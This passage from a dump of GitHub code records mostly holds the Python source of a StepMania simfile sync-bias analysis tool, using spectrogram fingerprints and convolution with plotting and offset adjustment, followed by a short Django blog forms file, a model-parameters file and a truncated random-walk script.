target_axes[0]\n ax.clear()\n pcm = ax.pcolormesh(times_ms, frequencies_kHz, acc)\n ax.set_ylabel('Frequency [kHz]')\n ax.set_xlabel('Time [msec]', labelpad=-12)\n ax.plot(times_ms + magic_offset_ms, post_kernel_over_freq, 'w-')\n ax.plot(frequency_line, frequencies_kHz, 'r-')\n if hide_yticks:\n ax.set_yticks([])\n ax.set_xlim(-fingerprint_ms, fingerprint_ms)\n ax.xaxis.set_major_locator(mticker.FixedLocator(time_ticks))\n ax.xaxis.set_major_formatter(mticker.FixedFormatter([f'{v:0.0f}' for v in time_ticks]))\n ax.xaxis.set_minor_locator(mticker.FixedLocator((-fingerprint_ms * 0.7, fingerprint_ms * 0.7)))\n ax.xaxis.set_minor_formatter(mticker.FixedFormatter((r'$\\longleftarrow late \\longleftarrow$', r'$\\longrightarrow early 
\\longrightarrow$')))\n plt.setp(ax.xaxis.get_minorticklabels(), rotation=0, size=10, va=\"center\")\n ax.tick_params('x', which='minor', pad=24, bottom=False)\n ax.get_figure().suptitle(plot_title)\n\n # Digest in beat domain\n ax = target_axes[1]\n ax.clear()\n pcm = ax.pcolormesh(times_ms, beat_indices, digest)\n pcm.set_clim(np.percentile(digest[:], 10), np.percentile(digest[:], 90))\n ax.set_ylabel('Beat Index')\n ax.set_xlabel('Time [msec]', labelpad=-12)\n ax.plot(times_ms + magic_offset_ms, post_kernel_over_beat, 'w-')\n ax.plot(beatindex_line, beat_indices, 'r-')\n if hide_yticks:\n ax.set_yticks([])\n ax.set_xlim(-fingerprint_ms, fingerprint_ms)\n ax.xaxis.set_major_locator(mticker.FixedLocator(time_ticks))\n ax.xaxis.set_major_formatter(mticker.FixedFormatter([f'{v:0.0f}' for v in time_ticks]))\n ax.xaxis.set_minor_locator(mticker.FixedLocator((-fingerprint_ms * 0.7, fingerprint_ms * 0.7)))\n ax.xaxis.set_minor_formatter(mticker.FixedFormatter((r'$\\longleftarrow late \\longleftarrow$', r'$\\longrightarrow early \\longrightarrow$')))\n plt.setp(ax.xaxis.get_minorticklabels(), rotation=0, size=10, va=\"center\")\n ax.tick_params('x', which='minor', pad=24, bottom=False)\n ax.get_figure().suptitle(plot_title)\n\n # Post-convolution plot\n ax = target_axes[2]\n ax.clear()\n if kernel_target == KernelTarget.ACCUMULATOR:\n pcm = ax.pcolormesh(times_ms, frequencies_kHz, post_kernel)\n ax.set_ylabel('Frequency [kHz]')\n ax.plot(times_ms + magic_offset_ms, post_kernel_over_freq, 'w-')\n ax.plot(frequency_line, frequencies_kHz, 'r-')\n else: # kernel_target == KernelTarget.DIGEST\n pcm = ax.pcolormesh(times_ms, beat_indices, post_kernel)\n ax.set_ylabel('Beat Index')\n ax.plot(times_ms + magic_offset_ms, post_kernel_over_beat, 'w-')\n ax.plot(beatindex_line, beat_indices, 'r-')\n pcm.set_clim(np.percentile(post_kernel[:], 3), np.percentile(post_kernel[:], 97))\n ax.set_xlabel('Time [msec]', labelpad=-12)\n if hide_yticks:\n ax.set_yticks([])\n ax.set_xlim(-fingerprint_ms, fingerprint_ms)\n ax.xaxis.set_major_locator(mticker.FixedLocator(time_ticks))\n ax.xaxis.set_major_formatter(mticker.FixedFormatter([f'{v:0.0f}' for v in time_ticks]))\n ax.xaxis.set_minor_locator(mticker.FixedLocator((-fingerprint_ms * 0.7, fingerprint_ms * 0.7)))\n ax.xaxis.set_minor_formatter(mticker.FixedFormatter((r'$\\longleftarrow late \\longleftarrow$', r'$\\longrightarrow early \\longrightarrow$')))\n plt.setp(ax.xaxis.get_minorticklabels(), rotation=0, size=10, va=\"center\")\n ax.tick_params('x', which='minor', pad=24, bottom=False)\n ax.get_figure().suptitle(plot_title)\n\n\ndef get_full_title(base_simfile):\n simfile_artist = base_simfile.artisttranslit or base_simfile.artist\n simfile_title = base_simfile.titletranslit or base_simfile.title\n simfile_subtitle = base_simfile.subtitletranslit or base_simfile.subtitle\n return f'{simfile_title}{simfile_subtitle and (\" \" + simfile_subtitle) or \"\"}'\n\n\ndef find_music(simfile_dir, music_filename):\n if (music_filename is None) or (len(music_filename) == 0):\n # Any info whatsoever about the music filename?\n music_stem = ''\n else:\n if os.path.isfile(os.path.join(simfile_dir, music_filename)):\n # Already know which music file is being used.\n return music_filename\n\n # Let's at least look for a matching filename stem.\n music_stem = os.path.splitext(os.path.split(music_filename)[1])[0]\n \n files = os.listdir(simfile_dir)\n # StepMania supports MP3, WAV, OGA, and OGG\n # Project OutFox community might use Opus or FLAC\n music_options = [f for f in 
files if os.path.splitext(f)[1] in ['.wav', '.mp3', '.oga', '.ogg', '.opus', '.flac']]\n if music_stem == '':\n # Any audio file will be accepted here.\n music_options_fn = music_options\n else:\n # Only audio files that match the presumed stem are accepted.\n music_options_fn = [f for f in music_options if os.path.splitext(f)[0].lower() == music_stem.lower()]\n \n if len(music_options_fn) != 1:\n # Last-ditch effort. Any music files, even if they don't match the filename??\n music_options_fn = music_options\n\n if len(music_options_fn) == 0:\n # No audio...\n raise FileNotFoundError(f'No audio file matching {music_filename}')\n elif len(music_options_fn) > 1:\n # Too many audio...\n raise FileNotFoundError(f'Too many audio files matching {music_filename}')\n\n music_found = music_options_fn[0]\n logging.info(f\"Simfile/chart audio substitution: {(music_filename is None) and '' or music_filename} --> {music_found}\")\n return music_found\n\n\ndef check_sync_bias(simfile_dir, base_simfile, chart_index=None, report_path=None, save_plots=True, show_intermediate_plots=False, **kwargs):\n fingerprint = {\n 'beat_digest': None, # Beat digest fingerprint (beat index vs. time)\n 'beat_indices': None, # Beat indices that contributed to the digest\n 'freq_domain': None, # Accumulation in frequency domain (frequency vs. time)\n 'post_kernel': None, # Post-kernel\n 'bias_result': None, # Scalar value result of the bias analysis\n 'convolution': None, # 1-D plot of the convolution response (where the time at max determines the bias)\n 'time_values': None, # x-axis\n 'frequencies': None, # y-axis (for frequencies)\n 'plots_title': None, # title used for the plot (contains simfile info, bias, etc.)\n 'files_title': None # title stem used for saving plots to files\n }\n\n kernel_type = kwargs.get('kernel_type', BiasKernel.RISING)\n kernel_target = kwargs.get('kernel_target', KernelTarget.DIGEST)\n magic_offset_ms = kwargs.get('magic_offset_ms', 0.0) # Why though\n full_spectrogram = kwargs.get('full_spectrogram', False)\n\n simfile_artist = base_simfile.artisttranslit or base_simfile.artist\n simfile_title = base_simfile.titletranslit or base_simfile.title\n simfile_subtitle = base_simfile.subtitletranslit or base_simfile.subtitle\n\n # Account for split audio\n audio_path = os.path.join(simfile_dir, find_music(simfile_dir, base_simfile.music))\n chart = None\n if chart_index is not None:\n chart = base_simfile.charts[chart_index]\n if chart.get('MUSIC') is not None:\n audio_path = os.path.join(simfile_dir, find_music(simfile_dir, chart.music))\n\n engine = TimingEngine(TimingData(base_simfile, chart))\n\n ###################################################################\n # Load audio using pydub\n audio_ext = os.path.splitext(audio_path)[1]\n audio = AudioSegment.from_file(audio_path, format=audio_ext[1:])\n audio_data = np.array(audio.get_array_of_samples())\n\n # Account for stereo audio and normalize\n # https://stackoverflow.com/questions/53633177/how-to-read-a-mp3-audio-file-into-a-numpy-array-save-a-numpy-array-to-mp3\n if audio.channels == 2:\n #audio_data = audio_data.reshape((-1, 2)).sum(1) * 0.5 # Reshape to stereo and average the two channels\n #audio_data = audio_data.reshape((-1, 2))[:, 0].flatten() # Pull mono only\n audio_data = audio_data.reshape((-1, 2)).max(1) # Reshape to stereo and average the two channels\n audio_data = audio_data / 2**15\n\n ###################################################################\n # Create spectrogram from audio\n # 
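The spectrogram setup that follows converts the millisecond knobs into sample counts before calling scipy.signal.spectrogram. Working the defaults above (window_ms=10, step_ms=0.2) through a hypothetical 44.1 kHz frame rate makes the overlap arithmetic concrete:

frame_rate = 44100            # Hz; the real value comes from the audio file
window_ms, step_ms = 10, 0.2  # defaults from _PARAM_DEFAULTS

nperseg = int(frame_rate * window_ms * 1e-3)   # 441 samples per window
nstep = int(frame_rate * step_ms * 1e-3)       # 8 samples per hop
noverlap = nperseg - nstep                     # 433 shared samples
assert (nperseg, nstep, noverlap) == (441, 8, 433)
# Effective column spacing is nstep / frame_rate, about 0.18 ms.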
https://stackoverflow.com/questions/44787437/how-to-convert-a-wav-file-to-a-spectrogram-in-python3\n # https://stackoverflow.com/questions/47954034/plotting-spectrogram-in-audio-analysis\n fingerprint_ms = kwargs.get('fingerprint_ms', 50) # Moving fingerprint window (100ms is quite reasonable)\n window_ms = kwargs.get('window_ms', 10) # Window to calculate spectrogram over, ms\n step_ms = kwargs.get('step_ms', 0.2) # Overlap between windows (effectively step size), ms\n freq_emphasis = kwargs.get('freq_emphasis', 3000) # filt(f) = f * e^(-f / emphasis); use None to bypass\n eps = 1e-9 # Epsilon for logarithms\n\n nperseg = int(audio.frame_rate * window_ms * 1e-3) # number of samples per spectrogram segment\n nstep = int(audio.frame_rate * step_ms * 1e-3) # number of samples per spectrogram step\n noverlap = nperseg - nstep # number of overlap samples\n\n # Recalculate actual timestamps of spectrogram measurements\n actual_step = nstep / audio.frame_rate\n fingerprint_size = 2 * int(round(fingerprint_ms * 1e-3 / actual_step))\n\n frequencies = None\n times = None\n spectrogram = None\n window_size = nperseg / nstep\n spectrogram_offset = np.sqrt(0.5) * window_size # trying to figure out why this isn't half a window...smh\n # spectrogram_offset = 0.5 * window_size # maybe it should be??\n # print(spectrogram_offset * actual_step)\n n_time_taps = ((audio_data.shape[0] - nperseg) / nstep).__ceil__() # ceil(samples / step size)\n n_freq_taps = 1 + nperseg // 2 # Nyquist of the spectrogram segment (nperseg)\n\n # print(fingerprint_size)\n\n if full_spectrogram:\n # print(f'audio: {audio_data.shape}, nperseg: {nperseg}, noverlap: {noverlap}, actual_step: {actual_step}, n_spectral_taps: {n_time_taps}, n_freq_taps: {n_freq_taps}')\n frequencies, times, spectrogram = signal.spectrogram(\n audio_data[:],\n fs=audio.frame_rate,\n window='hann',\n nperseg=nperseg,\n noverlap=noverlap,\n detrend=False\n )\n # print(times[:10])\n # print(f'freqs, times, spec: {frequencies.shape}, {times.shape}, {spectrogram.shape}')\n splog = np.log2(spectrogram + eps) # Calculate in log domain\n\n if show_intermediate_plots:\n fig = plt.figure(figsize=(30, 6))\n plt.pcolormesh(times, frequencies * 1e-3, splog)\n plt.ylabel('Frequency [kHz]')\n plt.xlabel('Time [sec]')\n plt.title(f'Full spectrogram for {simfile_artist} - \"{simfile_title}\"')\n plt.show()\n\n ###################################################################\n # Use beat timing information to construct a \"fingerprint\"\n # of audio spectra around the time each beat takes place\n \n # Accumulator over beats, summed in the frequency domain\n acc = np.zeros((n_freq_taps, fingerprint_size))\n\n # Time-scale digest (frequencies flattened to single value,\n # each beat gets a fingerprint width)\n digest = np.zeros((0, fingerprint_size))\n\n # For each beat in the song that has a full\n # fingerprint's width of surrounding audio data:\n b = 0\n beat_indices = []\n t_last = -np.inf\n while True:\n t = engine.time_at(b)\n b += 1\n if (t < 0):\n # Too early\n continue\n if (t > audio.duration_seconds):\n # Too late\n break\n if (t - t_last < fingerprint_ms * 1e-3):\n # Too soon\n continue\n t_last = t\n\n # Because the spectrogram doesn't \"start\" until a full window is in view,\n # it has an inherent offset that amounts to half a window.\n # spectrogram_offset = window_ms * 0.5e-3\n # t_offset = (t - spectrogram_offset)\n\n t_s = int(round(t / actual_step - spectrogram_offset - fingerprint_size * 0.5))\n t_f = int(round(t / actual_step - spectrogram_offset + 
fingerprint_size * 0.5))\n if full_spectrogram:\n print(f'{t_s}~{t_f}: {times[t_s]:0.6f}~{times[t_f]:0.6f} -> {(times[t_f]+times[t_s])*0.5:0.6f} vs. {t:0.6f}')\n\n t_s = max(0, t_s)\n t_f = min(n_time_taps, t_f)\n if (t_f - t_s != fingerprint_size):\n # Not enough data at this beat tbh\n continue\n \n if full_spectrogram:\n sp_snippet = splog[:, t_s:t_f]\n else:\n t_sample_s = t_s * nstep\n t_sample_f = t_f * nstep + nperseg - 1 \n # print(f't_sample: {t_sample_s}:{t_sample_f}')\n \n frequencies, times, spectrogram = signal.spectrogram(\n audio_data[t_sample_s:t_sample_f],\n fs=audio.frame_rate,\n window='hann',\n nperseg=nperseg,\n noverlap=noverlap,\n detrend=False\n )\n # print(f'freqs, times, spec: {frequencies.shape}, {times.shape}, {spectrogram.shape}')\n sp_snippet = np.log2(spectrogram + eps) # Calculate in log domain\n \n frequency_weights = 1\n if freq_emphasis is not None:\n # filt(f) = f * e^(-f / emphasis); use None to bypass\n frequency_weights = np.tile(frequencies * np.exp(-frequencies / freq_emphasis), [fingerprint_size, 1]).T\n spfilt = sp_snippet * frequency_weights\n\n # Accumulate, and add to digest\n acc += spfilt[:n_freq_taps, :]\n digest = np.vstack([digest, np.sum(spfilt, axis=0)])\n beat_indices.append(b-1)\n \n\n ###################################################################\n # Apply a convolution to detect the downbeat attack\n\n if kernel_type == BiasKernel.LOUDEST:\n # Loudest point of attack\n time_edge_kernel = np.array([\n [1, 3, 10, 3, 1],\n [1, 3, 10, 3, 1],\n [1, 3, 10, 3, 1],\n [1, 3, 10, 3, 1],\n [1, 3, 10, 3, 1]\n ])\n else: # BiasKernel.RISING\n # Leading edge of attack\n time_edge_kernel = np.array([\n [1, 1, 0, -1, -1],\n [1, 1, 0, -1, -1],\n [1, 1, 0, -1, -1],\n [1, 1, 0, -1, -1],\n [1, 1, 0, -1, -1]\n ])\n edge_discard = time_edge_kernel.shape[1] // 2\n\n if kernel_target == KernelTarget.ACCUMULATOR:\n post_kernel = signal.convolve2d(acc, time_edge_kernel, mode='same', boundary='wrap')\n else: # kernel_target == KernelTarget.DIGEST\n post_kernel = signal.convolve2d(digest, time_edge_kernel, mode='same', boundary='wrap')\n \n # Flatten convolved fingerprint to a value that only depends on time\n post_kernel_flat = np.sum(post_kernel, axis=0)\n fingerprint_times = np.arange(-fingerprint_size // 2, fingerprint_size // 2) * actual_step\n fingerprint_times_ms = fingerprint_times * 1e3\n\n # Choose the highest response to the convolution as the downbeat attack\n post_kernel_clip = post_kernel_flat[edge_discard:-edge_discard]\n i_max = np.argmax(post_kernel_clip)\n sync_bias_ms = fingerprint_times_ms[i_max + edge_discard] + magic_offset_ms\n probable_bias = guess_paradigm(sync_bias_ms, short_paradigm=False, **kwargs)\n # print(f'Sync bias: {sync_bias:0.3f} ({probable_bias})')\n\n # Calculate a confidence statistic based on the presence of conflicting\n # high-level response distant from the chosen peak\n v_clip = np.interp(post_kernel_clip, (min(post_kernel_clip), max(post_kernel_clip)), (0, 1))\n t_clip = fingerprint_times_ms[edge_discard:-edge_discard]\n v_std = np.std(v_clip)\n v_mean = np.mean(v_clip)\n v_median = np.median(v_clip)\n v_20 = np.percentile(v_clip, 20)\n v_80 = np.percentile(v_clip, 80)\n v_max = v_clip[i_max]\n v_max_check = np.vstack((np.zeros_like(v_clip), (v_clip - v_median) / (v_max - v_median)))\n v_max_rivaling = np.max(v_max_check, axis=0)\n t_close_check = np.vstack((np.zeros_like(t_clip), abs(t_clip - t_clip[i_max]) - _NEARNESS_OFFSET)) / _NEARNESS_SCALAR\n t_close_enough = np.max(t_close_check, axis=0)\n max_influence 
= np.power(v_max_rivaling, 4) * np.power(t_close_enough, 1.5)\n total_max_influence = np.sum(max_influence) / np.size(max_influence)\n sync_confidence = min(1, (1 - np.power(total_max_influence, 0.2)) / _THEORETICAL_UPPER)\n conv_interquintile = v_80 - v_20\n conv_stdev = v_std\n\n full_title = get_full_title(base_simfile)\n\n plot_tag_vars = kwargs.get('tag_vars', {}) \n if len(plot_tag_vars) == 0:\n plot_tag = ''\n plot_tag_filename = ''\n else:\n plot_tag = ' (' + ', '.join(f'{k} = {v.format(kwargs.get(k))}' for k, v in plot_tag_vars.items()) + ')'\n plot_tag_filename = '-' + '-'.join(f'{k}_{v.format(kwargs.get(k))}' for k, v in plot_tag_vars.items())\n\n chart_tag = ''\n if chart is not None:\n fingerprint['steps_type'] = chart['STEPSTYPE']\n fingerprint['chart_slot'] = chart['DIFFICULTY']\n chart_tag = ' ' + slot_abbreviation(chart['STEPSTYPE'], chart['DIFFICULTY'], chart_index=chart_index, paradigm=guess_paradigm(sync_bias_ms, **kwargs))\n fingerprint['sample_rate'] = audio.frame_rate\n fingerprint['beat_digest'] = digest\n fingerprint['beat_indices'] = np.array(beat_indices)\n fingerprint['freq_domain'] = acc\n fingerprint['post_kernel'] = post_kernel\n fingerprint['convolution'] = post_kernel_flat\n fingerprint['frequencies'] = frequencies * 1e-3\n fingerprint['time_values'] = fingerprint_times_ms\n fingerprint['bias_result'] = sync_bias_ms\n fingerprint['confidence'] = sync_confidence\n fingerprint['conv_stdev'] = conv_stdev\n fingerprint['conv_quint'] = conv_interquintile\n fingerprint['plots_title'] = \\\n f'Sync fingerprint{plot_tag}\\n{simfile_artist} - \"{full_title}\"{chart_tag}' + \\\n f'\\n{sync_bias_ms:+0.1f} ms bias ({probable_bias}), {round(sync_confidence*100):d}% conf'\n \n sanitized_title = slugify(full_title + chart_tag, allow_unicode=False)\n target_axes = []\n target_figs = []\n for i in range(3):\n fig = plt.figure(figsize=(6, 6))\n target_figs.append(fig)\n target_axes.append(fig.add_subplot(1, 1, 1))\n \n plot_fingerprint(fingerprint, target_axes, **kwargs)\n\n # DEBUG: convolution output for confidence research\n with open(os.path.join(report_path, f'convolution-{sanitized_title}.csv'), 'w', newline='', encoding='ascii') as conv_fp:\n writer = csv.writer(conv_fp)\n for t, v in zip(fingerprint_times_ms, post_kernel_flat):\n writer.writerow([f'{t:0.6f}', f'{v:0.6f}'])\n\n for i, v in enumerate(['freqdomain', 'beatdigest', 'postkernel']):\n fig = target_figs[i]\n if show_intermediate_plots:\n fig.show()\n if save_plots:\n fig.savefig(os.path.join(report_path, f'bias-{v}-{sanitized_title}{plot_tag_filename}.png'))\n plt.close(fig)\n\n plot_hook_gui = kwargs.get('plot_hook_gui')\n if plot_hook_gui is not None:\n plot_fingerprint(fingerprint, plot_hook_gui.figure.get_axes(), hide_yticks=True, **kwargs)\n plot_hook_gui.canvas.draw()\n\n if show_intermediate_plots:\n # Quick and dirty plot of convolution response\n plt.plot(fingerprint_times_ms, post_kernel_flat)\n plt.show()\n\n # Done!\n return fingerprint\n\n\ndef check_paths(params):\n # Verify existence of root path\n root_path = params['root_path']\n if not os.path.isdir(root_path):\n raise Exception(f'Root directory doesn\\'t exist: {root_path}')\n else:\n print(f\"Root directory exists: {root_path}\")\n\n # Verify existence of root path\n report_path = params['report_path']\n if report_path is None:\n report_path = os.path.join(root_path, '__bias-check')\n params['report_path'] = report_path\n if not os.path.isdir(report_path):\n try:\n os.makedirs(report_path)\n print(f\"Report directory created: 
{report_path}\")\n except Exception as e:\n raise Exception(f'Report directory can\\'t be created: {report_path}')\n else:\n print(f\"Report directory exists: {report_path}\")\n\n\ndef setup_logging(report_path: str):\n # Set up logging\n log_stamp = timestamp()\n log_path = os.path.join(report_path, f'nine-or-null-{log_stamp}.log')\n log_fmt = logging.Formatter(\n '[%(asctime)s.%(msecs)03d] %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n )\n logging.basicConfig(\n filename=log_path,\n encoding='utf-8',\n level=logging.INFO\n )\n logging.getLogger().addHandler(logging.StreamHandler())\n for handler in logging.getLogger().handlers:\n handler.setFormatter(log_fmt)\n\n csv_path = os.path.join(report_path, f'nine-or-null-{log_stamp}.csv')\n return {\n 'log_stamp': log_stamp,\n 'log_path': log_path,\n 'csv_path': csv_path\n }\n\n\ndef batch_process(root_path=None, **kwargs):\n gui_hook = kwargs.get('gui_hook')\n csv_hook = kwargs.get('csv_hook')\n\n if root_path is None:\n root_path = os.getcwd()\n simfile_dirs = []\n for r, d, f in os.walk(root_path):\n for fn in f:\n if os.path.splitext(fn)[1] in ['.ssc', '.sm']:\n simfile_dirs.append(r)\n \n simfile_dirs = sorted(list(set(simfile_dirs)))\n fingerprints = {}\n logging.info(f'Found {len(simfile_dirs)} simfiles in {root_path}')\n for d in simfile_dirs:\n logging.info(f'\\t{os.path.relpath(d, root_path)}')\n\n time_start = dt.utcnow()\n for i, p in enumerate(simfile_dirs):\n # Open simfile\n test_simfile_path = None\n for f in os.listdir(p):\n if os.path.splitext(f)[1] in ['.ssc', '.sm']:\n if (test_simfile_path is None) or (os.path.splitext(test_simfile_path)[1] == '.sm'):\n test_simfile_path = os.path.join(p, f)\n if test_simfile_path is None:\n # How did this happen!\n continue\n\n try:\n time_elapsed = dt.utcnow() - time_start\n time_elapsed_str = timedelta_as_hhmmss(time_elapsed) + ' elapsed'\n if i > 0:\n time_expected = time_elapsed * (len(simfile_dirs) / i)\n time_elapsed_str += ', ' + timedelta_as_hhmmss(time_expected) + ' expected'\n logging.info(f'({i+1:d}/{len(simfile_dirs):d}: {time_elapsed_str})')\n if gui_hook is not None:\n gui_hook.SetStatusText(f'({i+1:d}/{len(simfile_dirs):d}: {time_elapsed_str}) Checking sync bias on {os.path.relpath(p, root_path)}...')\n gui_hook.allow_to_update()\n\n base_simfile = simfile.open(test_simfile_path, strict=False)\n # Account for split timing.\n charts_within = [None]\n for chart_index, chart in enumerate(base_simfile.charts):\n if any(k in chart for k in ['OFFSET', 'BPMS', 'STOPS', 'DELAYS', 'WARPS']):\n logging.info(f'{base_simfile.title}: {chart_index} ({chart.difficulty}) has split timing')\n charts_within.append(chart_index)\n\n for split_chart in charts_within:\n fp = check_sync_bias(p, base_simfile, chart_index=split_chart, save_plots=True, show_intermediate_plots=False, **kwargs)\n sync_bias_ms = fp['bias_result']\n sync_confidence = fp['confidence']\n conv_quint = 'conv_quint' in fp and f\"{fp['conv_quint']:0.6f}\" or '----'\n conv_stdev = 'conv_stdev' in fp and f\"{fp['conv_stdev']:0.6f}\" or '----'\n \n chart_abbr = '*'\n if split_chart is not None:\n chart = base_simfile.charts[split_chart]\n chart_abbr = slot_abbreviation(chart['STEPSTYPE'], chart['DIFFICULTY'], chart_index=split_chart, paradigm=guess_paradigm(sync_bias_ms, **kwargs))\n \n fp_lookup = os.path.join(p, chart_abbr)\n fingerprints[fp_lookup] = fp\n\n logging.info(f'\\t{fp_lookup}')\n logging.info(f'\\tderived sync bias = {sync_bias_ms:+0.1f} ms ({guess_paradigm(sync_bias_ms, short_paradigm=False, 
**kwargs)})')\n logging.info(f'\\tbias confidence = {round(sync_confidence*100):3d}% (interquintile spread = {conv_quint}, stdev = {conv_stdev})')\n if gui_hook is not None:\n row_index = len(fingerprints)-1\n gui_hook.grid_results.InsertRows(row_index, 1)\n gui_hook.grid_results.SetCellValue(row_index, 0, os.path.relpath(p, root_path))\n gui_hook.grid_results.SetCellValue(row_index, 1, chart_abbr)\n gui_hook.grid_results.SetCellValue(row_index, 2, f'{sync_bias_ms:+0.1f}')\n gui_hook.grid_results.SetCellValue(row_index, 3, f'{round(sync_confidence*100):3d}%')\n gui_hook.grid_results.SetCellValue(row_index, 4, guess_paradigm(sync_bias_ms, **kwargs))\n gui_hook.grid_results.MakeCellVisible(row_index, 4)\n for j in range(4):\n gui_hook.grid_results.SetReadOnly(row_index, j)\n gui_hook.grid_results.ForceRefresh()\n gui_hook.allow_to_update()\n if csv_hook is not None:\n row = {\n 'path': os.path.relpath(p, root_path),\n 'slot': chart_abbr,\n 'bias': f'{sync_bias_ms:0.3f}',\n 'conf': f'{sync_confidence:0.4f}',\n 'interquintile': f\"{fp.get('conv_quint', None)}\",\n 'stdev': f\"{fp.get('conv_stdev', None)}\",\n 'paradigm': guess_paradigm(sync_bias_ms, **kwargs),\n 'timestamp': timestamp(),\n 'sample_rate': fp.get('sample_rate', None)\n }\n for simfile_attr in ['title', 'titletranslit', 'subtitle', 'subtitletranslit', 'artist', 'artisttranslit', 'credit']:\n row[simfile_attr] = base_simfile.get(simfile_attr.upper(), '')\n for param in ['fingerprint_ms', 'window_ms', 'step_ms', 'kernel_type', 'kernel_target']:\n row[param] = kwargs.get(param, None)\n csv_hook.writerow(row)\n except Exception as e:\n logging.exception(e)\n\n return fingerprints\n \n\ndef batch_adjust(fingerprints, target_bias, **params):\n if target_bias == '+9ms':\n source_bias = 'null'\n bias_shift = +0.009\n elif target_bias == 'null':\n source_bias = '+9ms'\n bias_shift = -0.009\n else:\n raise Exception(f'What paradigm does \"{target_bias}\" represent?')\n\n logging.info(f'Converting charts with +9ms (In The Groove) bias to null (StepMania)...')\n affect_rows = params.get('affect_rows')\n for i, k in enumerate(fingerprints):\n if affect_rows is not None and i not in affect_rows:\n continue\n current_paradigm = fingerprints[k].get('bias_adjust', guess_paradigm(fingerprints[k]['bias_result'], **params))\n current_confidence = fingerprints[k].get('confidence', 100)\n if current_paradigm == source_bias and current_confidence >= params.get('confidence_limit', 0):\n logging.info(f'\\t{k}')\n # Open simfile\n p, abbr = os.path.split(k)\n test_simfile_path = None\n for f in os.listdir(p):\n if os.path.splitext(f)[1] in ['.ssc', '.sm']:\n if (test_simfile_path is None) or (os.path.splitext(test_simfile_path)[1] == '.sm'):\n test_simfile_path = os.path.join(p, f)\n if test_simfile_path is None:\n # How did this happen!\n logging.info(f'What? 
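# conv_quint/conv_stdev above use the old `cond and x or y` idiom, which silently
# yields y whenever x is falsy; the conditional expression avoids that edge case:
fp = {'conv_quint': 0.012345}  # hypothetical fingerprint record
conv_quint = f"{fp['conv_quint']:0.6f}" if 'conv_quint' in fp else '----'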
Couldn\\'t find a simfile at \"{p}\"')\n continue\n\n with simfile.mutate(\n test_simfile_path,\n backup_filename=test_simfile_path + \".oldsync\",\n strict=False\n ) as sm:\n try:\n if abbr == '*':\n new_offset = float(sm.offset) + bias_shift\n logging.info(f'\\t{float(sm.offset):6.3f} -> {new_offset:6.3f}: {k}')\n sm.offset = f'{new_offset:0.3f}'\n else:\n steps_type, chart_slot, chart_index = slot_expansion(abbr)\n if chart_index is None:\n chart_index = [i for i, c in enumerate(sm.charts) if c['STEPSTYPE'] == steps_type and c['DIFFICULTY'] == chart_slot][0]\n prev_offset = float(sm.charts[chart_index].get('OFFSET', sm.offset))\n new_offset = prev_offset + bias_shift\n logging.info(f'\\t{prev_offset:6.3f} -> {new_offset:6.3f}: {k}')\n sm.charts[chart_index]['OFFSET'] = f'{new_offset:0.3f}'\n fingerprints[k]['bias_result'] += bias_shift * 1e3\n fingerprints[k]['bias_adjust'] = target_bias\n \n gui_hook = params.get('gui_hook')\n if gui_hook is not None:\n font_cell = gui_hook.grid_results.GetCellFont(i, 0)\n gui_hook.grid_results.SetCellValue(i, 2, f\"{fingerprints[k]['bias_result']:+0.1f}\")\n gui_hook.grid_results.SetCellValue(i, 4, target_bias)\n for j in range(gui_hook.grid_results.GetNumberCols()):\n gui_hook.grid_results.SetCellFont(i, j, font_cell.MakeBold())\n\n\n except Exception as e:\n raise Exception(f'Something happened while adjusting bias for {test_simfile_path}') from e\n \n logging.info(f'Converting charts with +9ms (In The Groove) bias to null (StepMania)...Done!')\n \n","repo_name":"telperion/nine-or-null","sub_path":"nine-or-null/nine_or_null/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":40102,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"72324546113","text":"from django import forms\nfrom blog.models import Post,MyComment\nfrom ckeditor.fields import RichTextField\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass PostForm(forms.ModelForm):\n\n class Meta():\n model = Post\n fields = ('author','title','text','image')\n \n labels = {\n 'text': _(''),\n 'image': _('Post Image')\n }\n widgets = {\n 'author':forms.Select(attrs={\"class\":\"browser-defaul\"}),\n 'title':forms.TextInput(attrs={'class':'form-control mw-90'}),\n \n }\nclass MyCommentForm(forms.ModelForm):\n\n class Meta():\n model = MyComment\n fields = ('author','text')\n\n widgets = {\n 'author':forms.TextInput(attrs={'class':''}),\n 'text':forms.Textarea(attrs={'class':'form-control mw-10'})\n }\n","repo_name":"deezitheviper/custom-DjangoBlog","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11546657056","text":"sequence_length = 300\ninput_size = 378\nhidden_size = 64\nnum_layers = 2\nnum_classes = 2 # Depressed or not depressed\nbatch_size = 50\nnum_epochs = 10\nlearning_rate = 0.001\nrec_dropout = 0.05\nfeature_len = 378","repo_name":"HimangiM/Depression_Detection","sub_path":"codes/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"43832402963","text":"import os\nimport sys\nfrom random import choice\nrw_lib_dir = os.path.dirname(os.path.dirname(__file__))\nsys.path.append(rw_lib_dir)\n\nimport matplotlib.pyplot as plt\n\nfrom random_walk import RandomWalk\n\n\nclass RandomWalk2(RandomWalk):\n def 
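# The ±0.009 s shift applied above, isolated as a pure function so it can be
# tested without mutating simfiles on disk (the constant and the 3-decimal
# formatting are taken from the surrounding code):
def shift_offset(offset_str, bias_shift):
    return f"{float(offset_str) + bias_shift:0.3f}"

assert shift_offset("-0.120", +0.009) == "-0.111"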
